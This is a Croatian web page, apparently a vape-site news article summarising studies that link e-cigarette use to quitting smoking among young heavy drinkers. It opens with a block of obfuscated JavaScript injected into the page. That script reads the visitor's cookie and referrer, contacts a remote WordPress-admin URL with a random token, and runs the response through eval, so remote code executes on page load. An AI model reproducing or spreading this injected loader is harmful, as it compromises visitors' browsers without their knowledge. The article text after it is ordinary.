;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Novo istraživanje ispituje potiče li vaping pušenje prilikom konzumiranja alkohola

S obzirom na to da je korištenje alkohola povezano s većom vjerojatnošću korištenja duhana, trenutna studija proučavala je obrasce pušenja i vapinga kod mladih osoba koje prekomjerno piju.

Pod naslovom: “Je li korištenje e-cigareta povezano s nastavkom ili prestankom pušenja klasičnih cigareta“, u 24-mjesečnom longitudinalnom istraživanju kod mladih odraslih osoba koje konzumiraju alkohol, studija je prikupila podatke od 1002 ljudi iz SAD-a i Kanade kako bi se utvrdilo kako je korištenje e-cigareta utjecalo na njihove obrasce pušenja.

Istraživački tim otkrio je da su korisnici oba proizvoda (cigarete i e-cigarete) pretežno prešli na potpunu apstinenciju ili isključivo korištenje e-cigareta. U pušača je najčešći prijelaz bio apstinencija, nakon čega je slijedilo korištenje klasičnih cigareta. Nakon 24-mjesečne provjere, 63% korisnika samo e-cigareta prešlo je na apstinenciju, pri čemu je 37% nastavilo koristiti samo e-cigarete, a 0% je prešlo na dvostruku upotrebu ili upotrebu klasičnih cigareta.

S obzirom na te rezultate, istraživači su zaključili da su e-cigarete dale pozitivne rezultate. “Korištenje oba proizvoda kod mladih osoba koje su prekomjerno pile bilo je povezano s prestankom konzumiranja zapaljivog duhana tijekom vremena, a korištenje samo e-cigareta nije bilo povezano s kasnijom uporabom zapaljivog duhana.”

Redovit vaping pomaže u prestanku pušenja

Slično tome, nedavna australska studija pod naslovom: “Jesu li smanjenje i prestanak pušenja povezani s povećanom upotrebom e-cigareta“ zaključila je da, dok povremena uporaba e-cigareta nije bila povezana sa smanjenjem/prestankom pušenja, dnevna uporaba jest.

„U usporedbi s neupotrebom e-cigareta u ovom trenutku, svakodnevni korisnici e-cigareta izvijestili su o većoj vjerojatnosti smanjenja pušenja među trenutačnim svakodnevnim pušačimai vjerojatnije je da su prestali pušiti tijekom protekle godine. Smanjenje pušenja i prestanak pušenja zbog povremene uporabe e-cigareta nisu se značajno razlikovali od neuporabe e-cigareta”, stoji u sažetku studije.

Choose your Reaction!
Leave a Comment